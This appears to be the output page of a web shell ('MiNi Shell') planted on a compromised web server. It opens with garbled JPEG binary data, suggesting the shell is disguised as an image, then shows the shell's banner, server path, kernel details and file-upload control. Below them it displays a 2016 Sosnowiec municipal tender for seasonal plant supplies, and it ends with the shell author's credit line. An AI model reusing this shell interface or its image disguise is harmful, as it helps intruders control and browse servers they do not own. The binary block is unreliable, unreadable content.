JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160205/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160205/26076-N-2016.html

<p class="kh_header"><b>Sosnowiec: Dostawa materiału  roślinnego  do  obsadzenia gazonów i kwietników sezonowych  na terenie  miasta Sosnowca .</b><br>
<b>Numer ogłoszenia: 26076 - 2016; data zamieszczenia: 05.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Usług Komunalnych , ul. 3-go Maja 11, 41-200 Sosnowiec, woj. śląskie, tel. 032 2666297, 2664476.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzuk.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiału  roślinnego  do  obsadzenia gazonów i kwietników sezonowych  na terenie  miasta Sosnowca ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiału  roślinnego  do  obsadzenia gazonów i  kwietników sezonowych  na terenie  miasta Sosnowca . 
Przedmiot zamówienia wg kodów CPV Wspólnego Słownika Zamówień
              03.12.11.00- 6        Żywe rośliny, bulwy, korzenie,sadzonki i rozsady
              03.44.10.00- 3        Rośliny ozdobne, trawy, mchy lub porosty
zgodnie z:
A.   normami :
 BN-76/ 9125- 01   rośliny kwietnikowe jednoroczne i dwuletnie
 BN-71/ 9124- 02   materiał kwiaciarski - byliny
 BN-72/ 9128- 01   cebule, bulwy , kłącza i korzenie roślin ozdobnych

B. Wymagania dotyczące materiału roślinnego:
-    rośliny powinny być dojrzałe technicznie, jednolite w całej partii, zdrowe, nie zwiędnięte, 
-    pokrój roślin, barwa kwiatów i liści powinna być charakterystyczna dla gatunku i
     odmiany,                  
-   stopień rozwoju , wielkości i sposób uformowania powinny być jednakowe dla danego gatunku w całej partii,
-   bryła korzeniowa powinna być dobrze przerośnięta korzeniami, wilgotna i nie
    uszkodzona,
-   niedopuszczalne jest występowanie w partii roślin innych gatunków i odmian
-   rośliny powinny być w I wyborze, rozkrzewione, gatunki ozdobne z kwiatów wykwitnięte w 70 % 
-   rośliny powinny być zahartowane w pełni turgoru
-   materiał  części 1 ,3  wykazu powinien być w doniczkach, materiał części 2 i 3 wykazu powinien być przed dostawą wyjęty z doniczek lub dostarczony w doniczkach wg ustaleń.
 -   materiał  części 4 wykazu powinien być w opakowaniach jednostkowych w siatkach lub w opakowaniach tekturowych 
 -   każda partia materiału powinna być oznaczona wyraźną etykietą z oznaczeniem gatunku i liczby sztuk roślin.

C. Wady niedopuszczalne roślin:
-  uszkodzenia mechaniczne roślin,
-  ślady żerowania szkodników,
-  oznaki chorobowe
-  zwiędnięcie i pomarszczenie w częściach nadziemnych rośliny i korzeni,
-  uszkodzenie lub przesuszenie bryły korzeniowej,
-  zwiędnięcia liści i kwiatów
-  uszkodzenia pąków kwiatowych, łodyg liści i korzeni
-  wybiegnięcie roślin.

D. Transport materiału roślinnego
-  koszt transportu wliczony jest w cenę materiału roślinnego,
-  Wykonawca własnym transportem dostarczy sadzonki roślin w terminie i na miejsce    
   sadzenia uzgodnione z Zamawiającym na bieżąco
-  Wykonawca powinien zabezpieczyć rośliny w czasie transportu przed uszkodzeniem i  
   niekorzystnymi warunkami atmosferycznymi (rośliny powinny być ocienione, osłonięte od wiatru i
   zabezpieczone przed wyschnięciem)
   
E. Termin wykonania zamówienia

Terminy dostaw, asortyment i ilości zamawianych kwiatów ustalane będą na podstawie składanego przez Zamawiającego zamówienia telefonicznego, potwierdzonego emailem lub  faxem z 24-godzinnym wyprzedzeniem. O ilościach zamawianego materiału decyduje jednostronnie Zamawiający.
Zamawiający przy składaniu poszczególnych zamówień na dostawę kwiatów zastrzega sobie możliwość określenia koloru kwiatów zamawianego materiału roślinnego.
Materiał roślinny zamówiony na dany termin przez Zamawiającego należy dostarczyć jednorazowo w godzinach porannych w  wyznaczonym dniu do godz.7:00.

         
CZĘŚĆ 1-  OBSADZENIE  GAZONÓW
 RAZEM:7 500 szt.
Termin wykonania zamówienia od 15.05.2016r. do 15.06.2016r.
                                                                
CZĘŚĆ 2 - OBSADZENIE KWIETNIKÓW 
- kwiaty rabatowe 
RAZEM:86 000 szt.
Termin wykonania zamówienia od 15.05.2016r. do 31.06. 2016r.

CZĘŚĆ 3 - OBSADZENIE KWIETNIKÓW  i GAZONÓW  - jesienne 

 RAZEM:27 000 szt.
Termin wykonania zamówienia poz. 1 od 07.10.2016r. do 18.10.2016r.
                                        poz. 2-3 od 01.09.2016r. do 15.09.2016r. 


CZĘŚĆ 4 - CEBULE KWIATOWE
 RAZEM:10 600 szt
Termin wykonania zamówienia od 15.09.2016 do 18.10.2016
                                                      
CZĘŚĆ 5 - Wczesnowiosenne obsadzenie gazonów i kwietników
RAZEM:2 000 szt
Termin wykonania zamówienia od 21.03.2016 do 20.04.2016r.
                                                    
1.    Wymagania co do przedmiotu zamówienia:
1.1  Zamawiający może wyrywkowo dokonywać kontroli jakości dostarczonej partii 
       materiału roślinnego.
2.    Charakterystyka zamówienia:
2.1. Zamawiający nie dopuszcza udziału podwykonawców  w postępowaniu.
2.2. Zamawiający nie dopuszcza możliwości składania ofert wariantowych.  
2.3  Zamawiający nie dopuszcza składanie ofert częściowych.
2.4  Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej. 
2.5  Wykonawca winien zatrudniać osoby zdolne do wykonania zamówienia oraz
       dysponować niezbędnym sprzętem 
2.6  Zamawiający dopuszcza do udziału w postępowaniu wszystkich wykonawców, którzy 
       mogą zrealizować zamówienie, forma prowadzonej działalności nie ma znaczenia.
2.7  Wykonawca winien posiadać stosowne zezwolenia wymagane do realizacji
       zamówienia.
2.8  Wykonawca jest odpowiedzialny za jakość i zgodność dostawy z normami
       jakościowymi i warunkami technicznymi opisanymi dla przedmiotu zamówienia ,
2.9  Wymagana jest należyta staranność przy realizacji zamówienia, 
2.10Szczegółowe ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane
       będą przez Zamawiającego z ustalonym przedstawicielem Wykonawcy, 
2.11Niezbędne jest określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonywania 
       zamówienia, 
2.12Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania zamówienia,
2.13Uzasadnione reklamacje dotyczące złej jakości części lub całości dostarczonej partii materiału roślinnego winny być rozpatrzone w dniu ich zgłoszenia,
       Wymiana wadliwego materiału zostanie dokonana najpóźniej w dniu następnym,
2.14Dostawa następować winna transportem Wykonawcy i na jego wyłączny koszt
       sukcesywnie według składanych zapotrzebowań, w terminach podanych w SIWZ,
2.15Dowóz materiału roślinnego odbywać się będzie o umówionym czasie i na umówione miejsce w całości z klarowną specyfikacją umożliwiającą sprawdzenie materiału pod względem ilości, gatunku i odmiany,   
2.16Odbiór przez Wykonawcę skrzynek  po kwiatach najpóźniej drugiego dnia od
       zgłoszenia.

WYMAGANIA OGÓLNE DLA WSZYSTKICH CZĘŚCI

Zamówienia będą odbywać się partiami wg uzgodnień z Wykonawcą, którego oferta zostanie wybrana do realizacji.
Wykonawca dostarczy zamówiony materiał roślinny na własny koszt do Zespołu Budowy i Konserwacji Terenów Zieleni  Miejskiego Zakładu Usług Komunalnych ; 41-200 Sosnowiec, ul. Andersa  - / boczna / 9 lub bezpośrednio na miejsce ich wysadzenia ( po uzgodnieniu z Wykonawcą ).
Wykonawca zobowiązany jest do realizacji zamówienia w następnym dniu po informacji (zamówieniu) faxem , emailem lub telefonicznie od Zamawiającego.

Zamawiający zastrzega sobie :
-możliwość niewykorzystania pełnej ilości zamówionego przedmiotu zamówienia,co uzależnione jest od faktycznego zapotrzebowania.
- możliwość przesunięcia ilościowego pomiędzy określonym asortymentem materiału roślinnego , przy czym  wartość zamówienia nie może przekroczyć kwoty brutto zawartej w formularzu ofertowym
- dopuszcza się po uzgodnieniu z Wykonawcą w przypadkach uzasadnionych
koniecznością realizacji nowego zadania , zamawianie innego asortymentu, materiału roślinnego wg rozliczenia indywidualnego.

TERMIN REALIZACJI ZAMÓWIENIA : Termin wykonania zamówienia: sukcesywnie dla poszczególnych części zamówienia wg potrzeb Zamawiającego od dnia 21.03.2016r. do 18.10.2016r..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.12.11.00-6, 03.44.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie mogą się ubiegać Wykonawcy, którzy posiadają uprawnienia do wykonywania określonej działalności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana zostanie na zasadzie spełnia - nie spełnia , poprzez  szczegółowa analizę treści oferty, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. 17 niniejszej SIWZ, które Wykonawca jest zobowiązany dołączyć do oferty. Z treści załączonych dokumentów musi jednoznacznie wynikać ,iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana zostanie na zasadzie spełnia - nie spełnia , poprzez  szczegółowa analizę treści oferty, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. 17 niniejszej SIWZ, które Wykonawca jest zobowiązany dołączyć do oferty. Z treści załączonych dokumentów musi jednoznacznie wynikać ,iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana zostanie na zasadzie spełnia - nie spełnia , poprzez  szczegółowa analizę treści oferty, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. 17 niniejszej SIWZ, które Wykonawca jest zobowiązany dołączyć do oferty. Z treści załączonych dokumentów musi jednoznacznie wynikać ,iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana zostanie na zasadzie spełnia - nie spełnia , poprzez  szczegółowa analizę treści oferty, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. 17 niniejszej SIWZ, które Wykonawca jest zobowiązany dołączyć do oferty. Z treści załączonych dokumentów musi jednoznacznie wynikać ,iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy o spełnieniu norm przedmiotowych przez oferowane dostawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzuk.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MIEJSKI ZAKŁAD USŁUG KOMUNALNYCH
41-200 Sosnowiec	ul. Plonów 22/I.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2016 godzina 12:30, miejsce: MIEJSKI ZAKŁAD USŁUG KOMUNALNYCH  41-200 Sosnowiec	,ul. Plonów 22/I
sekretariat - pokój nr 20 - 1 piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiału  roślinnego  do  obsadzenia gazonów i  kwietników sezonowych  na terenie  miasta Sosnowca..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część  1- materiał  roślinny do obsadzenia gazonów - 7 500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.12.11.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.05.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiału  roślinnego  do  obsadzenia gazonów i  kwietników sezonowych  na terenie  miasta Sosnowc.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część 2 - materiał roślinny do obsadzenia kwietników - 86 000szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.12.11.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.05.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa materiału  roślinnego  do  obsadzenia gazonów i  kwietników sezonowych  na terenie  miasta Sosnowca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część 3 - materiał roślinny - obsadzenie jesienne kwietników - 27 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.12.11.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa materiału  roślinnego  do  obsadzenia gazonów i  kwietników sezonowych  na terenie  miasta Sosnowca..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część 4 - cebule kwiatowe - 10 600 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.12.11.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa materiału  roślinnego  do  obsadzenia gazonów i  kwietników sezonowych  na terenie  miasta Sosnowca..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część 5 - obsadzenie wiosenne kwietników - 2 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.12.11.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 21.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com